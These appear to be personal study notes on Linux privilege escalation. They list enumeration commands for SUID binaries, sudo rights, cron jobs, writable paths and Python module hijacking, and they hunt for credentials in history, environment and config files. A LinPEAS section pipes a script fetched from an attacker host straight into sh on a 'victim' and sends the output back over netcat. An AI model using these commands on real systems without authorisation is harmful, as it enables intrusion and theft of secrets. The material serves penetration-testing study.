Linux Privilege Escalation Resources


Starter

Some shells are “dumb” and don’t allow job control or proper signal handling. Upgrading to a TTY allows for Ctrl+C, arrow keys, tab completion, and better interactivity:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'




This just fixes the shell and lets you use clear (it tells programs what kind of terminal is being used)

export TERM=xterm




Privilege Escalation (OS, Kernel, Services)

Check the OS version and kernel. Knowing this helps identify vulnerabilities or misconfigurations specific to the OS/kernel:

uname -a




Info about the Linux Distro

cat /etc/lsb-release




Info about the Linux Distro (All distros and more info)

cat /etc/os-release




Check what version of sudo is running

sudo -V




Check what commands I can run with sudo (entries marked NOPASSWD need no password)

sudo -l




Create a list of all currently installed packages

apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list




Shows Binaries on the system

ls -l /bin /usr/bin/ /usr/sbin/




Root-owned files with the setuid bit set (shown as an s in the owner execute position); these run as root no matter which user executes them

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null




Lists all root-owned files with setuid and setgid bits, which run with elevated privileges when executed.

find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null




List file capabilities (fine-grained root privileges granted to a binary without it being setuid) on all binaries in the usual bin directories

find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;




Checks if any packages on GTFOBins are installed on the system (THIS IS GOOD)

for i in $(curl -s https://gtfobins.github.io/ | html2text | cut -d" " -f1 | sed '/^[[:space:]]*$/d');do if grep -q "$i" installed_pkgs.list;then echo "Check GTFO for: $i";fi;done




Scheduled tasks that run as root may be vulnerable if you can modify scripts:

ls -la /etc/cron.daily/




Processes running as root can indicate privilege escalation opportunities:

ps aux | grep root




Who is logged in and what they are running can help find active users, shells, or processes to target:

ps au




System Info & Environment

Check environment variables (might contain a password or other secrets)

env




I don't know what this does yet; they didn't explain it.

echo $PATH




Check the shells that exist on the system

cat /etc/shells




Find user login shells in /etc/passwd

grep "sh$" /etc/passwd




Check what groups are on the system

cat /etc/group




List members of a given group (here, sudo)

getent group sudo




Check when a user last logged in

lastlog




Check who else is logged in

w




Files, Configs & Credential Hunting

User home directories may contain sensitive information (SSH keys, scripts, credentials). Accessing these can help in lateral movement or privilege escalation.

Users often leave sensitive commands in their history, like sudo commands or credentials:

history




Look for config files anywhere on the system, skipping /proc

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null




Find all configuration files

find / -type f \( -name "*.conf" -o -name "*.config" \) -exec ls -l {} \; 2>/dev/null




Find scripts on the system

find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"




Find all hidden files on a system

find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null




Find all hidden directories

find / -type d -name ".*" -ls 2>/dev/null




View all temporary files

ls -l /tmp /var/tmp /dev/shm




Finding history files

find / -type f \( -name "*_hist" -o -name "*_history" \) -exec ls -l {} \; 2>/dev/null




Lists the commands of all processes running on the system

find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"




Find world writable files on a system (useful for finding cron scripts to edit)

find / -path /proc -prune -o -type f -perm -o+w -exec ls -lda {} \; 2>/dev/null




Find writable directories (potential for dropping scripts or escalating privileges):

find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null




Networking

Check the network interfaces and the addresses assigned to them

ip a




Check what other networks are accessible

route




Check DNS configuration (Might contain Active Directory information)

cat /etc/resolv.conf




See if there is anything in /etc/hosts

cat /etc/hosts




Check what other hosts the target has been talking to

arp -a




Python Priv Esc

Check permissions on any Python script that gets run as a privileged user (both the script itself and the modules it imports)

  • If you have write permission on the script or a module it imports, you can change that file directly

  • Or run this and check where the module's directory sits in the search order (the output lists directories in the order Python searches them for an import, so a module placed in an earlier writable directory is found before the real one and your code gets called)

python3 -c 'import sys; print("\n".join(sys.path))'
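An added example (not part of these notes) that turns the $PATH line from the environment section and the sys.path bullet above into one audit: it flags search-path entries that are empty or relative, missing (and whether the nearest existing parent is world-writable, so anyone could create the missing directory), or group- or world-writable. The function names and the temporary directories in demo() are my own construction.

```python
import os
import stat
import sys
import tempfile

def audit_search_path(entries):
    """Return [(entry, reason), ...] for risky entries; safe ones are omitted."""
    findings = []
    for entry in entries:
        if entry == "" or not os.path.isabs(entry):
            # "" and "." both mean the current directory to the loader
            findings.append((entry, "relative or empty (resolves to cwd)"))
        elif not os.path.exists(entry):
            # a missing directory can be created by anyone who can write to
            # its nearest existing ancestor, so inspect that ancestor too
            parent = entry
            while not os.path.exists(parent):
                parent = os.path.dirname(parent)
            reason = "missing"
            if os.stat(parent).st_mode & stat.S_IWOTH:
                reason += " (creatable: %s is world-writable)" % parent
            findings.append((entry, reason))
        else:
            mode = os.stat(entry).st_mode
            if mode & stat.S_IWOTH:
                findings.append((entry, "world-writable"))
            elif mode & stat.S_IWGRP:
                findings.append((entry, "group-writable"))
    return findings

def demo():
    """Constructed sample (temporary dirs, not real system paths); returns reasons in entry order."""
    base = tempfile.mkdtemp()  # mode 0700, so the missing entry below is not creatable
    dirs = [os.path.join(base, n) for n in ("safe", "grp", "world")]
    for d, mode in zip(dirs, (0o755, 0o775, 0o777)):
        os.mkdir(d)
        os.chmod(d, mode)
    entries = dirs + ["", os.path.join(base, "gone", "bin")]
    return [reason for _, reason in audit_search_path(entries)]

if __name__ == "__main__":
    for label, entries in (("$PATH", os.environ.get("PATH", "").split(":")), ("sys.path", sys.path)):
        for entry, reason in audit_search_path(entries) or [("(none)", "no issues found")]:
            print("%s %r: %s" % (label, entry, reason))
```

Run it as the user that will execute the privileged script; a "missing" sys.path entry such as a stale .zip is normal, but a missing entry whose parent is world-writable is not.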




Running LinPEAS and Outputting to Host Machine

Download LinPEAS:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh




Start a simple HTTP server on your host to serve the file (port 8000 by default):

python -m http.server




Listen on your host machine to capture LinPEAS output:

nc -lvnp 9002 | tee linpeas.out




On the victim machine, fetch and run LinPEAS, and pipe output back to your host:

curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002




Misc (IDK where to put them)

They say to check for these (IDK where to put this other than misc)

Checks the dependencies for a custom dynamic library

ldd <application>

Search the current directory tree for strings that look like credentials (password, secret, token, api key and similar):

grep -RIn --color=always -E 'password|passwd|pass(word)?|pwd|secret|api[_-]?key|token' .